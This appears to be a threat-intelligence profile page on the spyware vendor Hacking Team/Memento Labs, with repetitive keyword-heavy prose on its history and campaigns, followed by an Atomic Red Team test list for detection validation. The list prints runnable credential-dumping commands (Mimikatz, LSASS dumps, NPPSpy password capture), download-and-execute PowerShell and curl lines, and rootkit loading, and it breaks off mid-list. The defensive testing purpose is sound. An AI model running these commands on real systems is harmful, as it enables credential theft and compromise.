hacking_team_memento_labs · threatengine.sh

Home/Threat Actor/Hacking Team (Memento Labs / RCS Lab)

Threat Actor

Hacking Team (Memento Labs / RCS Lab)

hacking_team_memento_labs · italian_commercial_spyware_vendor_active_through_memento_labs_rebrand · active since 2003-01

Hacking Team (rebranded Memento Labs April 2 2019 after InTheCyber Group €1 acquisition) is an Italian commercial spyware vendor based in Milan founded 2003 by David Vincenzetti, selling Remote Control System (RCS) Da Vinci + Galileo + post- rebrand RCS X + Dante product family to government law enforcement + intelligence agency customers globally with ~22-year operational lifecycle making it second-longest-lifecycle commercial spyware vendor in cell after FinFisher.

Italian PSOA attribution via Wikipedia canonical longstanding tracking + Phineas Fisher July 5 2015 400GB breach ("Since we have nothing to hide, we're publishing all our e-mails, files, and source code") with 70- customer list + 40M+ EUR revenue + source code disclosure via BitTorrent + Mega + WikiLeaks + The Record / Recorded Future News / Daryna Antoniuk canonical October 2025 Memento Labs Dante Russia- Belarus coverage + Kaspersky canonical March 2025 ForumTroll discovery + October 2025 Dante attribution to Memento Labs + Hackmag canonical November 2025 Paolo Lezzi public confirmation + MIT Technology Review + Vice/Motherboard / Lorenzo Franceschi-Bicchierai April 2019 InTheCyber acquisition coverage + Schneier on Security canonical July 2015 Galileo backdoor analysis + Dark Reading + ESET / We Live Security canonical March 2018 post-leak analysis + SentinelLabs canonical September 8 2021 EGoManiac Turkish OdaTV analysis + Infinite Eyes News + Silicon UK + Citizen Lab + UN Sudan panel + RSF industry coverage.

standalone cluster paralleling dsirf_knotweed + variston_heliconia + finfisher_finspy in v0.1.163 commercial spyware / mercenary surveillance vendor operators cell continuation; operational target profile 70 government customers revealed in 2015 leak (mostly military + police + federal + provincial governments) + signature Azerbaijan + Bahrain + Egypt + Morocco + Uzbekistan + UAE + Saudi Arabia + Sudan human- rights-abuse-affiliated customers per 2015 leak + Sudanese National Intelligence and Security Service 960,000 EUR 2012 contract in violation of UN sanctions + FBI + DEA + US federal law enforcement + Turkish OdaTV journalists 2010-2016 per SentinelLabs EGoManiac attribution + Russian media outlets + universities + research centers + government institutions + financial organizations per 2025 ForumTroll phishing targeting + Russian and Belarusian targets via 2025 Dante deployment; operational attack architecture: (1) cluster- defining 2003 Italian founding by David Vincenzetti establishing 22-year operational lifecycle second-longest in cell after FinFisher's ~14-year pre-insolvency operational period.

(2) cluster- defining July 5 2015 Phineas Fisher 400GB breach with internal emails + invoices + source code + 70-customer list + 40M+ EUR revenue + Lebanese Army + Sudan + Bahrain + Kazakhstan invoicing evidence revealed via BitTorrent + Mega + WikiLeaks dissemination, same vigilante hacker who breached Gamma Group/FinFisher August 2014 creating major parallel commercial-spyware-vendor exposure pattern.

(3) cluster-defining Galileo crisis- procedure remote-shutdown backdoor + watermarked customer software signature tradecraft per Schneier on Security ("Hacking Team... has 'a backdoor' into every customer's software, giving it ability to suspend it or shut it down, something that even customers aren't told about. To make matters worse, every copy of Hacking Team's Galileo software is watermarked, according to the source, which means Hacking Team, and now everyone with access to this data dump, can find out who operates it and who they're targeting with it"); (4) cluster-defining April 2016 Italian government global export license revocation restricting sales outside EU to individual export licenses per customer following Sudan + Saudi Arabia + Egypt human-rights-abuse evidence.

(5) cluster- defining April 2 2019 InTheCyber Group €1 acquisition + Memento Labs rebrand under CEO Paolo Lezzi providing operational continuity via corporate transformation ("We want to change absolutely everything. We're starting from scratch")

(6) cluster-defining 2023 ISS World MEA conference Dante spyware unveiling at the "wiretapper's ball" surveillance industry conference for law enforcement + intelligence agencies marking Memento Labs post-rebrand product launch.

(7) cluster-defining March 2025 Kaspersky ForumTroll campaign attribution via Chrome CVE-2025-2783 zero-day (most-recent CVE in entire corpus) with Russian-scientific-forum- invitation phishing emails + malicious link Chrome zero-day exploitation targeting Russian media + universities + research + government + financial orgs (honest attribution nuance: Lezzi stated Chrome 0-day was NOT developed by Memento Labs); (8) cluster-defining October 2025 Memento Labs CEO Paolo Lezzi public confirmation of Dante attribution blaming customer for outdated- Windows-version exposure ("Obviously, they used an agent that was already 'dead'. I thought that government clients weren't using it anymore") + disclosing only 2 former Hacking Team employees remain at Memento Labs + fewer than 100 current clients + mobile-platform-exclusive focus post- 2025.

(9) signature ESET March 2018 post-leak continued-operations evidence with Hacking Team samples compiled September 2015 - October 2017 + VMProtect obfuscation + Scout + Soldier payload naming continuity + new code signing certificates + same compilation patterns continuing from pre- leak development practices establishing ~2-year post-breach operational continuity.

(10) signature multi-platform capability with Windows + Mac + Linux + Android + iOS + BlackBerry + Symbian + Windows Mobile + Windows Phone class operating system coverage + Tor network communication interception capability + iPhone enterprise- certificate non-jailbreak bypass installation per Lookout 2015 + cryptocurrency wallet exfiltration; (11) signature 2012 Reporters Without Borders Corporate Enemies of the Internet designation + June 2014 UN panel monitoring Sudan sanctions inquiry + Tablem Limited 20% Saudi-investor reported 2016 acquisition + 2013 OECD complaint co-filer ECCHR + Privacy International + Bahrain Centre for Human Rights against Trovicor + Gamma Group establishing accountability advocacy ecosystem.

cluster fills the Italian-PSOA-2003- founding + Milan-based-David-Vincenzetti-founder + RCS-Galileo-Da-Vinci-product-line + Phineas- Fisher-July-5-2015-400GB-breach + 70-customers- 40M-euro-revenue + Azerbaijan-Bahrain-Egypt- Morocco-Uzbekistan-UAE-Saudi-Arabia-Sudan-human- rights-abuse-customers + April-2016-Italian-export- license-revocation + April-2-2019-InTheCyber- Memento-Labs-rebrand + Paolo-Lezzi-CEO + 2023- ISS-World-Dante-unveiling + March-2025-Kaspersky- ForumTroll-Russia-Belarus-Dante-Chrome-CVE-2025- 2783 + October-2025-Lezzi-Dante-confirmation position in commercial spyware / mercenary surveillance vendor operators cell.

canonical illustration of second-longest-lifecycle commercial spyware vendor (~22 years across rebrand) + Phineas Fisher vigilante-exposure parallel to FinFisher August 2014 breach + state-trojan RCS product family + 70-customer 40M EUR revenue scale + Italian-government export license revocation accountability + InTheCyber €1 acquisition rebrand operational continuity + Dante spyware product evolution + most-recent-CVE-in- corpus Chrome CVE-2025-2783 ForumTroll campaign attribution cited in essentially all subsequent commercial spyware industry analyses through 2003- 2026 period.

italian_commercial_spyware_vendor_active_through_memento_labs_rebrand confidence: high 25 aliases

Sigma rules200 YARA rules6 Live IOCs0 CVEs exploited1

⬢

Profile

Hacking Team (rebranded Memento Labs April 2 2019) is an Italian commercial spyware vendor based in Milan founded 2003 by David Vincenzetti, selling Remote Control System (RCS) Da Vinci + Galileo + post-rebrand RCS X + Dante product family to government law enforcement + intelligence agency customers globally with ~22-year operational lifecycle making it second-longest-lifecycle commercial spyware vendor in cell after FinFisher. Italian PSOA attribution via Wikipedia canonical longstanding tracking + Phineas Fisher July 5 2015 400GB breach (70-customer + 40M EUR revenue disclosure) + Citizen Lab + The Record + Kaspersky October 2025 Memento Labs Dante attribution + MIT Technology Review + Vice/Motherboard + Hackmag + Schneier on Security + Dark Reading + ESET 2018 post-leak analysis + SentinelLabs 2021 + Infinite Eyes News + Silicon UK industry coverage. Standalone cluster paralleling dsirf_knotweed + variston_heliconia + finfisher_finspy in v0.1.163 commercial spyware / mercenary surveillance vendor operators cell continuation.

Operational target profile

70 government customers revealed in 2015 leak.
Azerbaijan + Bahrain + Egypt + Morocco + Uzbekistan + UAE + Saudi Arabia + Sudan human- rights-abuse-affiliated customers per 2015 leak.
Sudanese National Intelligence and Security Service 960k EUR 2012 contract (UN sanction violation)
FBI + DEA + US federal law enforcement.
Turkish OdaTV journalists 2010-2016.
Russian media + universities + research + government + financial (2025 ForumTroll)
Russian + Belarusian targets (2025 Dante) Operational attack architecture: (1) 2003 Italian founding (cluster-defining): ~22-year operational lifecycle (2) July 5 2015 Phineas Fisher 400GB breach (cluster-defining): 70 customer list + 40M EUR revenue + source code exposure via BitTorrent + Mega + WikiLeaks (3) Galileo crisis-procedure remote-shutdown backdoor + watermarked customer software (cluster- defining): distinctive vendor-controls-customer- deployment tradecraft (4) April 2016 Italian government export license revocation (cluster-defining): accountability action (5) April 2 2019 InTheCyber Group €1 acquisition + Memento Labs rebrand (cluster-defining): operational continuity via corporate transformation (6) Dante spyware 2023 ISS World MEA unveiling (cluster-defining): Memento Labs post-rebrand product (7) March 2025 Kaspersky ForumTroll campaign via Chrome CVE-2025-2783 (cluster-defining): most-recent CVE in entire corpus (8) October 2025 Lezzi Dante attribution confirmation (cluster-defining): vendor-to- public customer-deflection tradecraft (9) ESET 2018 post-leak continued-operations evidence (signature): Scout + Soldier payload naming + VMProtect + new code signing certificates September 2015.
October 2017 The cluster fills the Italian-PSOA-2003-founding + Milan-based-David-Vincenzetti-founder + RCS-Galileo- Da-Vinci-product-line + Phineas-Fisher-July-5-2015- 400GB-breach + 70-customers-40M-euro-revenue + Azerbaijan-Bahrain-Egypt-Morocco-Uzbekistan-UAE- Saudi-Arabia-Sudan-human-rights-abuse-customers + April-2016-Italian-export-license-revocation + April-2-2019-InTheCyber-Memento-Labs-rebrand + Paolo-Lezzi-CEO + 2023-ISS-World-Dante-unveiling + March-2025-Kaspersky-ForumTroll-Russia-Belarus- Dante-Chrome-CVE-2025-2783 + October-2025-Lezzi- Dante-confirmation position in commercial spyware / mercenary surveillance vendor operators cell.

☉

Aliases

hacking_team_memento_labshacking_teamhackingteammemento_labsmemento labsrcs_labrcs remote control systemda vinci spywaregalileo_spywarercs x platformdante_spywareitalian commercial spyware vendor 2003 foundingmilan italy hacking team founded david vincenzettiinthecyber group memento labs april 2019 acquisitionphineas fisher july 5 2015 400gb hacking team breachhacking team 70 customers 40 million euro revenue 2015 leakrcs sudan egypt saudi arabia bahrain customer leakitalian government export license revoked april 2016paolo lezzi memento labs ceo since 2019iss world prague mea conference rebranding launchdante forumtroll russia kaspersky chrome cve-2025-2783memento labs russia belarus kaspersky october 2025hacking team customers fbi dea us drug enforcementhacking team enemies of internet reporters without borders 2012hacking team galileo backdoor crisis procedure remote shutdown

⌖

Notable Campaigns

2025Memento Labs Paolo Lezzi October 2025 Dante Attribution Confirmation Signature
2025Memento Labs Dante Discovery via Kaspersky ForumTroll Campaign + Chrome CVE-2025-2783 (March-October 2025)
2023Memento Labs 2023 ISS World MEA Conference Dante Spyware Unveiling
2021Hacking Team SentinelLabs September 2021 EGoManiac Turkish OdaTV Signature
2019Hacking Team InTheCyber Group €1 Acquisition + Memento Labs Rebrand (April 2 2019)
2016Hacking Team Italian Government April 2016 Export License Revocation
2015-2018Hacking Team ESET March 2018 Post-Leak Continued-Operations Evidence
2015Hacking Team Galileo Crisis Procedure Remote-Shutdown Backdoor + Watermarked Customer Software Signature
2015Hacking Team Phineas Fisher July 5, 2015 400GB Breach
2014Hacking Team UN Panel 2014 Sudan Sales Inquiry
2012Hacking Team 2012 Reporters Without Borders Corporate Enemies of the Internet Designation
2003-2026Continued Industry Reference Status (2003-2026)
2003Hacking Team Origin, 2003 Milan David Vincenzetti Founding

★

Attribution & Reporting

Attributed by

Wikipedia (canonical longstanding 2003-2026 tracking)Phineas Fisher (canonical July 5 2015 400GB breach attribution)WikiLeaks (canonical 2015 leak data hosting)Citizen Lab / University of Toronto / Bill Marczak (canonical 2012-2014 Hacking Team RCS country usage research)The Record / Recorded Future News / Daryna Antoniuk (canonical October 2025 Memento Labs Dante Russia Belarus coverage)Kaspersky (canonical March 2025 ForumTroll discovery + October 2025 Dante-Memento attribution + CVE-2025-2783 Chrome zero-day reporting)MIT Technology Review (canonical The fall and rise of a spyware empire + Memento Labs analysis)Vice / Motherboard / Lorenzo Franceschi-Bicchierai (canonical April 2019 Hacking Team's New Owner We're Starting From Scratch)Hackmag.com (canonical November 2025 Paolo Lezzi Dante confirmation coverage)Schneier on Security / Bruce Schneier (canonical July 2015 Galileo backdoor analysis)Dark Reading (canonical July 2015 Italian Surveillance Software Maker Doxing Attack)ESET / We Live Security (canonical March 2018 New traces of Hacking Team in the wild post-leak analysis)SentinelLabs (canonical September 8 2021 EGoManiac Turkish threat actor RCS usage)Infinite Eyes News (canonical November 2025 Hacking Team Memento Labs State-Sponsored Spyware Resurgence)Silicon UK / Matthew Broersma (canonical July 2015 Galileo Surveillance Tool Now Obsolete coverage)Paolo Lezzi (canonical Memento Labs CEO public confirmations)David Vincenzetti (canonical Hacking Team founder)Reporters Without Borders (canonical 2012 Corporate Enemies of the Internet designation)UN panel monitoring Sudan sanctions (canonical 2014 Sudan sales inquiry)

Key reporting

reportWikipedia: HackingTeam, canonical longstanding 2003-2026 tracking

reportThe Record / Recorded Future News / Daryna Antoniuk: Italian-made spyware spotted in breaches of Russian Belarusian systems (October 2025)

reportKaspersky: canonical March 2025 ForumTroll campaign discovery + October 2025 Dante-Memento attribution + CVE-2025-2783 reporting

reportMIT Technology Review: The fall and rise of a spyware empire

reportVice / Motherboard / Lorenzo Franceschi-Bicchierai: Hacking Team's New Owner We're Starting From Scratch (April 2019)

reportHackmag.com: Memento Labs chief Paolo Lezzi confirmed Dante (November 2025)

reportSchneier on Security / Bruce Schneier: More on Hacking Team (July 2015 Galileo backdoor analysis)

reportDark Reading: Italian Surveillance Software Maker Falls Victim To Doxing Attack (July 2015)

reportESET / We Live Security: New traces of Hacking Team in the wild (March 2018 post-leak analysis)

reportSentinelLabs (September 8 2021): canonical EGoManiac Turkish threat actor RCS usage report

reportInfinite Eyes News: Hacking Team Memento Labs State-Sponsored Spyware Resurgence Inside Russia Belarus (November 2025)

reportSilicon UK / Matthew Broersma: Hacking Team RCS Galileo Surveillance Tool Now Obsolete (July 2015)

reportPhineas Fisher: canonical July 5 2015 400GB Hacking Team breach

reportUN panel monitoring Sudan sanctions: canonical 2014 Sudan sales inquiry

10 source links

https://en.wikipedia.org/wiki/HackingTeam

https://therecord.media/memento-labs-formerly-hacking-team-dante-spyware-russia-kaspersky

https://www.technologyreview.com/2019/11/29/131803/the-fall-and-rise-of-a-spyware-empire/

https://www.vice.com/en_us/article/neavnm/hacking-team-new-owner-starting-from-scratch

https://hackmag.com/news/memento-dante

https://www.schneier.com/blog/archives/2015/07/more_on_hacking_1.html

https://www.darkreading.com/cyberattacks-data-breaches/italian-surveillance-software-maker-falls-victim-to-doxing-attack

https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/

https://infiniteeyesnews.substack.com/p/hacking-team-memento-labs-state-sponsored

https://www.silicon.co.uk/security/hacking-team-galileo-obsolete-172413

⬡

Operational

State sponsor

Hacking Team (Italian: Milan-based) was an Italian commercial spyware vendor founded 2003 by David Vincenzetti, selling Remote Control System (RCS) Da Vinci + Galileo platforms to government law enforcement + intelligence agency customers globally with revenue exceeding 40 million euros disclosed in 2015 leak. Italian government revoked global export license April 2016 after Sudan + Saudi Arabia + Egypt human-rights-abuse evidence. After April 2019 InTheCyber Group €1 acquisition Hacking Team rebranded as Memento Labs under CEO Paolo Lezzi. October 2025 Kaspersky discovered Memento Labs' Dante spyware in real-world ForumTroll campaign against Russian targets, with Lezzi confirming Dante attribution. Attribution chain: (1) Wikipedia canonical longstanding tracking: per Wikipedia: "Hacking Team was a Milan-based information technology company that sold offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations. Its 'Remote Control Systems' enabled governments and corporations to monitor the communications of internet users, decipher their encrypted files and emails, record Skype and other Voice over IP communications, and remotely activate microphones and camera on target computers." (2) Phineas Fisher July 5 2015 400GB breach canonical exposure: per Wikipedia + Dark Reading + Schneier on Security: "On July 5, 2015, the Twitter account of the company was compromised by an unknown individual who published an announcement of a data breach against HackingTeam's computer systems. The initial message read, 'Since we have nothing to hide, we're publishing all our e-mails, files, and source code ...' and provided links to over 400 gigabytes of data, including alleged internal e-mails, invoices, and source code.

which were leaked via BitTorrent and Mega." (3) Canonical 70-customer + 40M EUR revenue Hacking Team disclosure: per Wikipedia + Infinite Eyes News + MIT Tech Review: "A full list of HackingTeam's customers were leaked in the 2015 breach. Disclosed documents show HackingTeam had 70 current customers, mostly military, police, federal and provincial governments. The total company revenues disclosed exceeded 40 million Euros... The 2015 breach revealed that the Italian company sold its surveillance software, known as the Remote Control System (RCS), to governments with poor human rights records, including Azerbaijan, Bahrain, Egypt, Morocco, Uzbekistan, UAE, Saudi Arabia and Sudan." (4) InTheCyber Group April 2 2019 acquisition + Memento Labs rebrand: per Wikipedia + MIT Technology Review + Vice/Motherboard: "On 2 April 2019 HackingTeam was acquired by InTheCyber Group to create Memento Labs." Per Vice/Motherboard: "Swiss-Italian company InTheCyber announced that it had acquired a majority stake into Hacking Team, and that it was merging the two companies into a new one called Memento Labs. The goal, according to the new owner of the company, Paolo Lezzi, is to rebuild." Per Infinite Eyes News: "after a one- euro merger-acquisition with InTheCyber Group, it has rebranded as Memento Labs under CEO Paolo Lezzi." (5) The Record + Kaspersky October 2025 Dante attribution canonical: per The Record / Daryna Antoniuk: "A Russian cybersecurity firm said it has found evidence that spyware developed by Italy's Memento Labs, formerly known as the controversial Hacking Team, was likely used in attacks on organizations in Russia and Belarus. In a report published Monday, researchers at Kaspersky said they identified the company's commercial spyware, known as Dante, in multiple attacks linked to a hacking group dubbed ForumTroll." Per Hackmag: "The head of the Italian company Memento Labs (formerly Hacking Team), Paolo Lezzi, confirmed to the media that the Dante spyware, recently discovered by Kaspersky Lab researchers in real-world attacks, does indeed belong to his company. Lezzi also blamed one of its government customers for exposing the spyware, saying they had used an outdated version." (6) CVE-2025-2783 Chrome zero-day ForumTroll March 2025 canonical campaign: per The Record: "The hackers targeted Russian media outlets, universities, research centers, government institutions, and financial organizations with phishing emails disguised as invitations to a well-known Russian scientific and expert forum. The attackers sent malicious links that exploited a zero-day vulnerability in Google's Chrome browser, the researchers said. Kaspersky reported the bug, now tracked as CVE-2025-2783, and Google patched it. Dante was not used in that campaign, the researchers said, but investigating ForumTroll incidents eventually led Kaspersky to discover the spyware el[sewhere]." Honest attribution nuance: Lezzi noted Chrome 0-day was NOT developed by his company per Hackmag. (7) ESET March 2018 post-leak continued- operations evidence: per ESET: "Our further research uncovered several more samples of Hacking Team's spyware created after the 2015 hack, all being slightly modified compared to variants released before the source code leak. The samples were compiled between September 2015 and October 2017... The versioning observed in the analyzed samples continues where Hacking Team left off before the breach, and follows the same patterns. Hacking Team's habit of compiling their payloads , named Scout and Soldier, consecutively, and often on the same day, can also be seen across the newer samples." (8) Italian government April 2016 export license revocation: per MIT Technology Review: "In response to human rights concerns, the Italian government revoked Hacking Team's global export license in April 2016, restricting sales outside the European Union to individual export licenses per customer." (9) Memento Labs operational continuity but diminished scale per Lezzi October 2025: per Hackmag: "Lezzi admitted that some 'aspects and behavior' of the Dante Windows spyware may have been borrowed from Hacking Team's software. He also said that only two employees from the former Hacking Team remain at Memento Labs, and declined to specify the exact number of the company's current clients (though he implied there are fewer than 100). According to Lezzi, his company is currently developing exclusively spyware for mobile platforms.

" Operational target profile

70 government customers revealed in 2015 leak per Wikipedia (mostly military + police + federal + provincial governments)
Azerbaijan + Bahrain + Egypt + Morocco + Uzbekistan + UAE + Saudi Arabia + Sudan human rights abuse-affiliated customers per 2015 leak.
Sudanese National Intelligence and Security Service: 960,000 EUR contract 2012 (UN sanction violation)
FBI + DEA + US federal law enforcement signature.
Turkish OdaTV journalists 2010-2016 per SentinelLabs EGoManiac attribution.
Russian + Belarusian targets (via Dante) per October 2025 Kaspersky ForumTroll attribution.
Russian media + universities + research centers + government + financial organizations signature ForumTroll March 2025 phishing targeting.
Journalists + activists + human rights defenders signature across operational history The cluster fills the Italian-PSOA-2003-founding + Milan-based-David-Vincenzetti-founder + RCS-Galileo- Da-Vinci-product-line + Phineas-Fisher-July-5-2015- 400GB-breach + 70-customers-40M-euro-revenue + Azerbaijan-Bahrain-Egypt-Morocco-Uzbekistan-UAE- Saudi-Arabia-Sudan-human-rights-abuse-customers + April-2016-Italian-export-license-revocation + April-2-2019-InTheCyber-Memento-Labs-rebrand + Paolo-Lezzi-CEO + 2023-ISS-World-Dante-unveiling + March-2025-Kaspersky-ForumTroll-Russia-Belarus- Dante-Chrome-CVE-2025-2783 + October-2025-Lezzi- Dante-confirmation position in commercial spyware / mercenary surveillance vendor operators cell.

Motivations

italian_commercial_spyware_vendor_revenue_long_term, government_law_enforcement_intelligence_agency_customer_target_market, rcs_remote_control_system_state_trojan_product_development, rebrand_to_memento_labs_2019_operational_continuity, dante_spyware_product_evolution_2023_post_rebrand_signature, 22_year_operational_lifecycle_second_longest_in_cell_signature

Sectors

70_government_clients military_police_federal_provincial_governments dissidents_activists_journalists human_rights_defenders russian_media_universities_government_2025 turkish_police_via_journalist_targeting

Regions

saudi_arabia sudan egypt bahrain azerbaijan kazakhstan mexico hungary italy uae morocco uzbekistan ethiopia lebanon turkey united_states_fbi_dea russia belarus

◈

Detection Blind Spots

60 techniques

Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.

Behavioral / log (Sigma)58/60 · 96%

Analytics (MITRE CAR)30/60 · 50%

Runtime / container (Falco)7/60 · 11%

File / malware (YARA)0/60 · 0%

Network (Suricata/Snort)19/60 · 31%

Vuln scan (Nuclei)0/60 · 0%

▸

Atomic Test Plan

30 techniques

Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

T1003 OS Credential Dumping · 7 tests

command_promptelevatedwindowsGsecdump

"#{gsecdump_exe}" -a

powershellelevatedwindowsCredential Dumping with NPPSpy

Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"

powershellelevatedwindowsDump svchost.exe to gather RDP credentials

$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full

powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*

powershellelevatedwindowsRetrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /config

powershellwindowsDump Credential Manager using keymgr.dll and rundll32.exe

rundll32.exe keymgr,KRShowKeyMgr

powershellwindowsSend NTLM Hash with RPC Test Connection

rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null

T1003.001 LSASS Memory · 14 tests

command_promptelevatedwindowsDump LSASS.exe Memory using ProcDump

"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}

powershellelevatedwindowsDump LSASS.exe Memory using comsvcs.dll

C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full

command_promptelevatedwindowsDump LSASS.exe Memory using direct system calls and API unhooking

"#{dumpert_exe}"

command_promptelevatedwindowsDump LSASS.exe Memory using NanoDump

PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"

manualwindowsDump LSASS.exe Memory using Windows Task Manager

command_promptelevatedwindowsOffline Credential Theft With Mimikatz

"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit

command_promptelevatedwindowsLSASS read with pypykatz

"#{venv_path}\Scripts\pypykatz" live lsa

powershellelevatedwindowsDump LSASS.exe Memory using Out-Minidump.ps1

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump

command_promptelevatedwindowsCreate Mini Dump of LSASS.exe using ProcDump

"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}

powershellelevatedwindowsPowershell Mimikatz

IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds

powershellelevatedwindowsDump LSASS with createdump.exe from .Net v5

$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id

powershellelevatedwindowsDump LSASS.exe using imported Microsoft DLLs

#{xordump_exe} -out #{output_file} -x 0x41

powershellelevatedwindowsDump LSASS.exe using lolbin rdrleakdiag.exe

if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
  } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
  } else {
      $binary_path = "File not found"
      exit 1
  }
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."

command_promptelevatedwindowsDump LSASS.exe Memory through Silent Process Exit

PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"

T1005 Data from Local System · 3 tests

powershellwindowsSearch files of interest and save them to a single zip file (Windows)

$startingDirectory = "#{starting_directory}"
$outputZip = "#{output_zip_folder_path}"
$fileExtensionsString = "#{file_extensions}" 
$fileExtensions = $fileExtensionsString -split ", "

New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null

Function Search-Files {
  param (
    [string]$directory
  )
  $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
    $fileExtensions -contains $_.Extension.ToLower()
  }
  return $files
}

$foundFiles = Search-Files -directory $startingDirectory
if ($foundFiles.Count -gt 0) {
  $foundFilePaths = $foundFiles.FullName
  Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"

  Write-Host "Zip file created: $outputZip\data.zip"
  } else {
      Write-Host "No files found with the specified extensions."
  }

bashlinuxFind and dump sqlite databases (Linux)

cd $HOME
curl -O #{remote_url}/art
curl -O #{remote_url}/gta.db
curl -O #{remote_url}/sqlite_dump.sh
chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;

shmacosCopy Apple Notes database files using AppleScript

osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'

T1010 Application Window Discovery · 1 test

command_promptwindowsList Process Main Windows - C# .NET

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} "#{input_source_code}"
#{output_file_name}

T1014 Rootkit · 4 tests

shelevatedlinuxLoadable Kernel Module based Rootkit

sudo insmod #{rootkit_path}/#{rootkit_name}.ko

shelevatedlinuxLoadable Kernel Module based Rootkit

sudo modprobe #{rootkit_name}

shelevatedlinuxdynamic-linker based rootkit (libprocesshider)

echo #{library_path} | tee -a /etc/ld.so.preload
/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden"

shelevatedlinuxLoadable Kernel Module based Rootkit (Diamorphine)

sudo modprobe #{rootkit_name}
ping -c 10 localhost >/dev/null & TARGETPID="$!"
ps $TARGETPID
kill -31 $TARGETPID
ps $TARGETPID || echo "process ${TARGETPID} hidden"

T1016 System Network Configuration Discovery · 9 tests

command_promptwindowsSystem Network Configuration Discovery on Windows

ipconfig /all
netsh interface show interface
arp -a
nbtstat -n
net config

command_promptwindowsList Windows Firewall Rules

netsh advfirewall firewall show rule name=all

shmacos, linuxSystem Network Configuration Discovery

